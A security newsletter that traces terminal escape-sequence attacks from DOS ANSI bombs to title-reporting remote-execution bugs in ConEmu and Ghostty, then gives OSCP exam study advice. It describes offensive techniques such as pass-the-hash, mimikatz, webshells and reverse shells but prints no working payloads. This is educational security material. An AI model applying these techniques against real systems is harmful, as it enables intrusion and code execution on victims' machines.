In 2024, there was a new CVE that allowed you to own someone through a title bar. It was a new variation of a 2003 bug. The technique? Older than that.

Ten terminal emulator CVEs dropped in 2023. I’ve loved terminal hacks since I was a kid. Let’s jump into an old favorite.

The old idea of an ANSI bomb is simple. You can use ANSI escape codes to change the behavior of the end user’s terminal and more importantly you can do this without executing code. They just need to view the exploit for it to work. Now back in the old (DOS) days this was done by abusing ANSI.sys. You could silently remap N to Y on say a BBS and then if someone ran del *.* on the wrong directory and pressed N, well they lost that directory. BWAHAHA. This was really funny to 12 year old me. Sadly, this doesn’t work in the modern world.

You can read about that glory here.

There are still attacks like the ANSI bomb that still work to this very day. Escape sequences as an attack surface still exist. The trust users give to their terminals can still be abused.

In WSL, you can use an escape sequence to hide your command in a text file:

You can also try the backspace trick where you can abuse \b to make it look one way and execute another.

Here’s a DefCon talk Weaponizing Plain Text ANSI Escape Sequences as a Forensic Nightmare - STÖK where malicious escape sequences are stored in logs so that they execute when an IR analyst views them to hide evidence or crash terminals or worse.

Back in 2003, HD Moore published a paper on terminal security showing you could set a terminal's window title to a shell command, query the title back, and the terminal would type that command into your shell. The attack looked like this:

It sets the title to a wget command, asks the terminal to report it back (which the terminal echoes into stdin), then makes the text invisible. RCE through a title bar.

Most terminals disabled title reporting after this. Most. In 2022, security researcher David Leadbeater found that ConEmu, one of the most popular Windows terminal emulators, still had it enabled by default. Worse, ConEmu accepted control characters in the echoback response, meaning an attacker didn't need the user to press Enter. The terminal would type AND execute the command with zero interaction.

This was tracked as CVE-2022-46387.

The initial fix was incomplete. ConEmu blocked some control characters but missed others, like ^O which GNU readline interprets as "accept and history next." A second CVE was assigned: CVE-2023-39150.

On December 26, 2024, Mitchell Hashimoto released Ghostty 1.0. Within hours, Leadbeater ran his terminal tester on it and published his findings.

Title reporting was enabled by default.

The bug from 2003 worked again. On macOS with zsh in vi mode (which is the default if your $EDITOR contains "vi"), this one-liner opens Calculator:

If a remote system is compromised, the attacker can send escape sequences back over your SSH session. Since the input goes through YOUR terminal, the command executes locally on YOUR machine, not the remote one. Leadbeater demonstrated this by stopping the user's shell process, writing the escape sequence to their TTY, and killing the shell. The command executes on disconnect.

This was assigned CVE-2024-56803. Ghostty 1.0.1 fixed it by disabling title reporting by default.

So they’re still out there. A really old class of bugs. HD Moore formalized many of them here but they were used and abused by many in the years before that. One that comes to mind was redirecting input and output to TTY. A whole other rabbit hole for a different day. These bugs never went away. Away from sight, maybe, but never from memory.

Terminal tricks are not on the OSCP.

I took the OSCP after working as a pen tester for a little over 3 years. I wasted so much time studying things that were not on the exam. I went down every rabbit hole and ran out of time on my first try. Failed it!

It was really demoralizing as I worked in the field and did pen tests every day. Still the failure taught me what was covered on the exam.

I aced it the second time because I knew what NOT to study. You should know everything here. It just shouldn’t be where you spend your time studying to pass the exam.

OSINT is important but the only OSINT skill you will need to pass the exam is how to find a public POC exploit.

You don’t need to know anything about finding emails, subdomains, breached credentials, and so on. You should know how to use searchsploit and the google dork site: github.com.

There just aren’t that many practical ways to test OSINT in this exam.

You won’t need to relay NTLM but you should know how to pass the hash.

You won’t need to know ARP poisoning, DNS spoofing, or need to use bettercap.

For the most part it just isn’t practical to test people on this. You should know how to use Coercer and coercion attacks but not for the OSCP, probably.

No RBCD. No Golden Ticket. No trust abuse.

This is definitely an area that I went too deep on when studying for the OSCP and ended up in OSEP and CRTO territory without realizing it.

Know pass the hash and pass the ticket. Wouldn’t hurt to know AD CS ESC1 but I don’t think that’s covered. It’s good to know either way though as it’s the top way that pen testers are getting domain admin these days.

Anything beyond basic knowledge is too much. You should know how SQLi works and how to do one. You should probably understand CSRF attacks as well. You should do a ton of CTF boxes and those simple web attacks that you do to get a foothold is what you will see.

You don’t need to know cache attacks, CL TE attacks, XSS, probably not XXE and others.

You do need to know how to deploy a simple PHP webshell or similar. These are found in /usr/share/webshells on Kali. Test them out on CTF boxes. However, anything complex is overkill. Just really simple webshells.

If you are doing anything besides changing the IP address in the exploit then you are doing too much and have gone down a rabbit hole. I often found myself trying to “fix” public POCs I had found only to find out it was the wrong exploit. There is no need for custom exploit development on the OSCP. If it doesn’t pop from searchsploit or GitHub you probably don’t need it.

NO AV or EDR on the OSCP machines! YAY. You can literally run mimikatz with no problem at all. Don’t spend a moment worrying about this topic for the exam.

Yes, you don’t even need to use Metasploit once on the exam. There is a ton you could learn here but you are much better served doing it by hand. Need a reverse shell and forgot the syntax? Go to revshells.com. Don’t spend time on Metasploit for the exam.

I failed the OSCP because I studied the wrong things. Now you don't have to.

If you still want more, check out my OSCP prep checklist on my GitHub here.

If you found this useful, forward it to someone who’d actually read it.

Got questions, corrections, or want to argue about something? Just hit reply. I read everything.

— Jeff